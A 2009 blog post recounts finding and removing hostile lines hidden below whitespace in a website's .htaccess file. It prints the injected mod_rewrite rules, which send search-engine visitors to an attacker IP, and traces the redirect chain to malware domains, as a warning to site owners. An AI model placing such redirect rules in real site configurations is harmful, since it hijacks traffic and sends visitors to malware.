Gnarly Malware – Hijacks Website .htaccess and Steals Search Engine Traffic
Posted by Hodge on Jan 14, 2009 in Security, Web Development • 1 comment •
A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.
I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
Which was also preceded by a couple of dozen lines of white space, so that to most users checking .htaccess, the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh to check the file).
Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).
Using a combination of traceroute and Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script to redirect to a string of sites – first to worldgreenpeace.cn (link to Google Safe Browsing Info Page), which installs a cookie: soft=1. This site then redirects the browser to the final target destination of bestantivirusfastscan.com (link to Google Safe Browsing Info page) which installs a cookie: av_inst=880147 (arbitrary ID number – although it seems that 880147 people may have been redirected already). This final site contains Malware, which I presume does something nasty, although I felt no inclination to investigate further!
Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly be back to normal, receiving the search engine traffic it should.
So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!
Something not quite right? Inaccuracies or invalid code? Didn’t work for you? Don’t like me using Ss instead of Zs? Add a comment below! All comments are welcome. Except spam, because spam is a bit crap.
|
|
Seis De Mayo $4.29 It wasn’t long after the recording of this, Trey Anastasio’s third–and most warmly idiosyncratic–solo album, that the Phish frontman/guitarist announced that his improvisation-fueled, cult-fave band would record no more. Longtime Phish-heads (or admirers of Anastasio’s previous free-form jazz excursions with Les Claypool and Stewart Copeland and more conventional solo work) may find this ambitio… |
|
|
Sapphire Video Card 100314-3l Hd 6870 1gb Ddr5 256bit Pci Express D-Dvi/Hdmi/Display Port Retail $222.69 PCI Express based PC is required with one X16 lane graphics slot available on the motherboard.4X75 Watt 6-pin PCI Express power connector is required for CrossFireX system.2X75 Watt 6-pin PCI Express power connector is required.1024MBMinimum of system memory.Installation software requires CD-ROM drive.DVD playback requires DVD drive.Blu-ray/HD DVD playback requires Blu-ray/HD DVD drive.Blu-ray/HD … |
|
|
ASUS Lamborghini VX6-PU17-BK 12.1-Inch Eee PC Netbook (Black) $685.70 Asus Lamborghini VX6-PU17-BK 12.1″ LED Netbook – Atom D525 1.80 GHz – Black VX6-PU17-BK 41… |
|
|
T101MT-BU17-BK 10.1 Netbook $599.99 Asus Eee PC T101MT-BU17-BK 10.1″ LED Net-tablet PC – Atom N450 1.66 GHz – Black T101MT-BU17-BK 202… |
|
|
CellularFactory: Laptop Computer Security Cable Lock (Silver) for Asus laptop $7.99 Laptop Computer Security Cable Lock (Silver) for Asus laptop . Laptop Computer Security Cable Lock for you to use to lock your laptop computer in an easy way.Features:Lock down your notebooks laptop computer with this unique, individual keys and locks for each computer. Galvanized steel cable for strong protectionEffective protection, anti-thief design keeps the sneakers away The T-bar mechanism b… |
No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.
[...] http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search…/ [...]